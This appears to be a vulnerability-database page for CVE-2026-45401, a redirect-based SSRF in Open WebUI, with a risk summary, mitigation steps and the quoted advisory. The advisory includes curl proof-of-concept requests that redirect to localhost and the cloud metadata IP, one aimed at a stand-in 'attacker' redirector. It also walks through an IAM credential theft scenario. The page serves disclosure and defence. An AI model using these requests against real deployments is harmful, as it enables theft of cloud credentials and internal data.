CVE-2026-45401 — HIGH (CVSS 8.5)

Q: Is CVE-2026-45401 actively exploited?

No confirmed active exploitation of CVE-2026-45401 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-45401?

1. Patch: upgrade open-webui to 0.9.5 — this is the only complete fix. 2. Network egress controls: block outbound HTTP from the Open WebUI process to 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 169.254.0.0/16 at the firewall or container network policy level. 3. IMDSv2 enforcement: if deployed on AWS, require IMDSv2 (hop limit 1, token-required) to block metadata access even if SSRF succeeds. 4. Access restriction: reduce Open WebUI access to vetted users only until patched; disable web retrieval and image-URL features if not operationally required. 5. Detection: alert on outbound connections from the Open WebUI container/process to private IP space in your WAF, eBPF-based network monitor, or cloud flow logs. 6. Dependency check: if running a custom fork, audit every HTTP client call site for allow_redirects=False and ensure validate_url() is called per redirect hop, not just on the initial URL.

Q: What systems are affected by CVE-2026-45401?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines with web retrieval, LLM chat frontends, agent frameworks, cloud-hosted AI assistants, internal AI platforms with network proximity to sensitive services.

Q: What is the CVSS score for CVE-2026-45401?

CVE-2026-45401 has a CVSS v3.1 base score of 8.5 (HIGH).

CISO Take

Open WebUI up to 0.9.4 contains a Server-Side Request Forgery flaw where the URL validation function only inspects the initial submitted URL while downstream HTTP clients silently follow 3xx redirects to private IP ranges, RFC1918 space, and cloud metadata endpoints — five independent code paths are affected. A CISO should care immediately because the most dangerous path (Path 5) requires only a valid user account and a normal chat message containing an image_url field — no admin rights, no special feature flag, no special endpoint — making the blast radius every authenticated user in the deployment; in AWS environments with IMDSv1 enabled, successful exploitation yields temporary IAM credentials and full cloud account pivot. There is no CISA KEV listing yet and EPSS data is pending, but the advisory includes a working curl PoC and CVSS scope is Changed (8.5), meaning exploitation crosses the trust boundary from the app process into internal infrastructure. Patch to open-webui 0.9.5 immediately; if patching is blocked, enforce egress filtering to drop requests to 127.0.0.0/8, 169.254.0.0/16, and RFC1918 ranges at the network layer, and enforce IMDSv2 on all cloud instances running Open WebUI.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

High risk. CVSS 8.5 with Changed scope, low complexity, low privilege, and no user interaction required. The most damaging exploitation path is reachable through the standard chat completion interface, meaning any user of a shared Open WebUI deployment is a potential threat actor. Cloud-hosted instances with IMDSv1 enabled face direct credential compromise; on-premise deployments face lateral movement into internal APIs, monitoring endpoints, and Kubernetes services. The package carries 91 prior CVEs, indicating a historically high vulnerability density that suggests exploitation infrastructure and attacker familiarity already exist.

Attack Kill Chain

Initial Access

Attacker authenticates to Open WebUI with any valid low-privilege user account — no admin rights, no special permissions required.

AML.T0012

SSRF Trigger

Attacker submits an attacker-controlled URL via the chat completion image_url field or /api/v1/retrieval/process/web endpoint; the URL points to an attacker-controlled redirect service.

AML.T0049

Redirect Follow to Internal Target

Open WebUI's HTTP client follows the 302 redirect to a private IP or cloud metadata endpoint (169.254.169.254) without re-running validate_url() on the Location header.

AML.T0037

Credential and Data Exfiltration

Internal service response — IAM credentials, internal API payloads, Kubernetes secrets — is returned in the API response body and collected by the attacker.

AML.T0025

Initial Access

Attacker authenticates to Open WebUI with any valid low-privilege user account — no admin rights, no special permissions required.

AML.T0012

SSRF Trigger

Attacker submits an attacker-controlled URL via the chat completion image_url field or /api/v1/retrieval/process/web endpoint; the URL points to an attacker-controlled redirect service.

AML.T0049

Redirect Follow to Internal Target

Open WebUI's HTTP client follows the 302 redirect to a private IP or cloud metadata endpoint (169.254.169.254) without re-running validate_url() on the Location header.

AML.T0037

Credential and Data Exfiltration

Internal service response — IAM credentials, internal API payloads, Kubernetes secrets — is returned in the API response body and collected by the attacker.

AML.T0025

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
langchain-community	pip	—	No patch
136.3K OpenSSF 6.4 1.2K dependents Pushed 5d ago 67% patched ~48d to patch Full package profile →
open-webui	pip	<= 0.9.4	`0.9.5`
136.3K Pushed 5d ago 75% patched ~4d to patch Full package profile →

Severity & Risk

CVSS 3.1

8.5 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Attack Surface

AV Network

AC Low

PR Low

UI None

S Changed

C High

I Low

A None

What should I do?

6 steps

Patch: upgrade open-webui to 0.9.5 — this is the only complete fix.
Network egress controls: block outbound HTTP from the Open WebUI process to 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 169.254.0.0/16 at the firewall or container network policy level.
IMDSv2 enforcement: if deployed on AWS, require IMDSv2 (hop limit 1, token-required) to block metadata access even if SSRF succeeds.
Access restriction: reduce Open WebUI access to vetted users only until patched; disable web retrieval and image-URL features if not operationally required.
Detection: alert on outbound connections from the Open WebUI container/process to private IP space in your WAF, eBPF-based network monitor, or cloud flow logs.
Dependency check: if running a custom fork, audit every HTTP client call site for allow_redirects=False and ensure validate_url() is called per redirect hop, not just on the initial URL.

Classification

Data Extraction Auth Bypass Data Leakage Framework RAG Agent AML.T0037 - Data from Local System AML.T0049 - Exploit Public-Facing Application AML.T0055 - Unsecured Credentials AML.T0075 - Cloud Service Discovery

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk management system

ISO 42001

A.6.2 - AI risk management

NIST AI RMF

MANAGE-2.2 - Mechanisms to sustain value of deployed AI systems

OWASP LLM Top 10

LLM02 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-45401?

Open WebUI up to 0.9.4 contains a Server-Side Request Forgery flaw where the URL validation function only inspects the initial submitted URL while downstream HTTP clients silently follow 3xx redirects to private IP ranges, RFC1918 space, and cloud metadata endpoints — five independent code paths are affected. A CISO should care immediately because the most dangerous path (Path 5) requires only a valid user account and a normal chat message containing an image_url field — no admin rights, no special feature flag, no special endpoint — making the blast radius every authenticated user in the deployment; in AWS environments with IMDSv1 enabled, successful exploitation yields temporary IAM credentials and full cloud account pivot. There is no CISA KEV listing yet and EPSS data is pending, but the advisory includes a working curl PoC and CVSS scope is Changed (8.5), meaning exploitation crosses the trust boundary from the app process into internal infrastructure. Patch to open-webui 0.9.5 immediately; if patching is blocked, enforce egress filtering to drop requests to 127.0.0.0/8, 169.254.0.0/16, and RFC1918 ranges at the network layer, and enforce IMDSv2 on all cloud instances running Open WebUI.

Is CVE-2026-45401 actively exploited?

No confirmed active exploitation of CVE-2026-45401 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45401?

1. Patch: upgrade open-webui to 0.9.5 — this is the only complete fix. 2. Network egress controls: block outbound HTTP from the Open WebUI process to 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 169.254.0.0/16 at the firewall or container network policy level. 3. IMDSv2 enforcement: if deployed on AWS, require IMDSv2 (hop limit 1, token-required) to block metadata access even if SSRF succeeds. 4. Access restriction: reduce Open WebUI access to vetted users only until patched; disable web retrieval and image-URL features if not operationally required. 5. Detection: alert on outbound connections from the Open WebUI container/process to private IP space in your WAF, eBPF-based network monitor, or cloud flow logs. 6. Dependency check: if running a custom fork, audit every HTTP client call site for allow_redirects=False and ensure validate_url() is called per redirect hop, not just on the initial URL.

What systems are affected by CVE-2026-45401?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines with web retrieval, LLM chat frontends, agent frameworks, cloud-hosted AI assistants, internal AI platforms with network proximity to sensitive services.

What is the CVSS score for CVE-2026-45401?

CVE-2026-45401 has a CVSS v3.1 base score of 8.5 (HIGH).

Technical Details

NVD Description

# Server-Side Request Forgery (SSRF) Bypass via HTTP Redirect Following in Web-Fetch, Image-Load, and Chat-Completion Endpoints ## Summary The `validate_url()` function in `backend/open_webui/retrieval/web/utils.py` only validates the *initial* URL submitted by the caller. The HTTP clients used downstream (sync `requests`, async `aiohttp`, langchain's `WebBaseLoader`) follow HTTP 3xx redirects by default and do **not** re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. `127.0.0.1`, `169.254.169.254`, RFC1918) and read the internal response body via the `/api/v1/retrieval/process/web` endpoint, the `/api/v1/images/...` endpoints, the `/api/chat/completions` endpoint with an `image_url` content part, and any other route that calls these helpers. ## Affected code paths The bypass exists across multiple call sites; each independently follows redirects without re-validation. ### Path 1 — sync `_scrape` via `SafeWebBaseLoader` `backend/open_webui/retrieval/web/utils.py` — `SafeWebBaseLoader` inherits from `langchain_community.document_loaders.WebBaseLoader`. The parent's `_scrape()` calls `self.session.get(url, **self.requests_kwargs)`. `requests_kwargs` only sets `timeout`; `allow_redirects=False` is **not** passed, so `requests.Session.get()` follows redirects with the default `allow_redirects=True`. `validate_url()` is invoked once on the original URL only. ### Path 2 — async `_fetch` (aiohttp) `backend/open_webui/retrieval/web/utils.py` — `_fetch()` previously inherited the aiohttp default `allow_redirects=True`. As of HEAD this path is fixed (`allow_redirects=False`). Listed for completeness. ### Path 3 — `get_content_from_url` (sync `requests.get`) `backend/open_webui/retrieval/utils.py` — `response = requests.get(url, stream=True, timeout=30)`. No `allow_redirects=False`. Reached via `/api/v1/retrieval/process/web` (file ingestion) and other routers that resolve external URLs. ### Path 4 — `load_url_image` (image edit) `backend/open_webui/routers/images.py` — image-URL fetching helper used by the image-edit endpoint. Same pattern: `validate_url()` checks only the initial URL, the underlying HTTP client follows redirects without re-validation. Reachable via `/api/v1/images/edit`. ### Path 5 — `get_image_base64_from_url` (chat-completion image inlining) `backend/open_webui/utils/files.py` — `get_image_base64_from_url()` is invoked from `convert_url_images_to_base64()` in `backend/open_webui/utils/middleware.py` on every `/api/chat/completions` request whose message content includes an `image_url` part. The shared aiohttp session pool (`backend/open_webui/utils/session_pool.py`) does not override the aiohttp default `allow_redirects=True`, and the call site itself does not pass `allow_redirects=False`. This is the most reachable variant in the cluster: no special endpoint, no admin permission, no feature flag — any authenticated user can trigger it from a normal chat message. ## Proof of concept Authenticated low-privilege user; default config, no admin or special permissions required. ```bash curl -X POST https://<target>/api/v1/retrieval/process/web \ -H "Authorization: Bearer <any_user_token>" \ -H "Content-Type: application/json" \ -d '{"url": "https://httpbin.org/redirect-to?url=http%3A%2F%2Flocalhost%3A8080%2Fapi%2Fconfig&status_code=302"}' ``` Response body contains the internal `/api/config` payload in `file.data.content`. Replace the redirect target with `http://169.254.169.254/latest/meta-data/` for cloud metadata, or any internal hostname reachable from the server. For the chat-completion path (Path 5), the same redirect is followed when an `image_url` content part points to an attacker-controlled redirector: ```bash curl -X POST https://<target>/api/chat/completions \ -H "Authorization: Bearer <any_user_token>" \ -H "Content-Type: application/json" \ -d '{"model":"any","messages":[{"role":"user","content":[{"type":"text","text":"x"},{"type":"image_url","image_url":{"url":"http://attacker/redirect-to-imdsv1"}}]}]}' ``` ## Impact Any authenticated user can read GET responses from any HTTP service reachable by the Open WebUI server process — cloud metadata services (IMDSv1 if available), localhost-bound application APIs, internal databases / monitoring / Kubernetes services, and VPN-bridged on-premise networks. ## Recommended fix For every call site that follows redirects, set `allow_redirects=False` on the underlying HTTP client and add a per-hop validation loop using `validate_url()` on each `Location:` header. ## Credits Per the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered. - **tenbbughunters** — first to identify SafeWebBaseLoader sync `_scrape` (Path 1) - **YLChen-007** — first to identify `load_url_image` (Path 4) - **tempcollab** — first to identify aiohttp `_fetch` (Path 2) - **sneaXOR** — first to identify `get_content_from_url` (Path 3) - **nayakchinmohan** — first to identify `get_image_base64_from_url` in chat-completion middleware (Path 5)

Exploitation Scenario

An attacker with a standard Open WebUI account on a company-internal AI assistant sends a chat message: POST /api/chat/completions with a content part of type image_url pointing to https://attacker-server/redir, which returns HTTP 302 Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-role. The Open WebUI aiohttp session pool follows the redirect with the default allow_redirects=True and fetches the IMDSv1 response. The IAM temporary credentials (AccessKeyId, SecretAccessKey, SessionToken) are base64-encoded and returned in the chat response body. The attacker extracts the credentials, calls aws sts get-caller-identity to confirm the role, and pivots into S3 buckets, RDS instances, or Secrets Manager — escalating from a chat interface login to cloud account compromise in under two minutes with no admin interaction and no network noise beyond a single outbound HTTP redirect.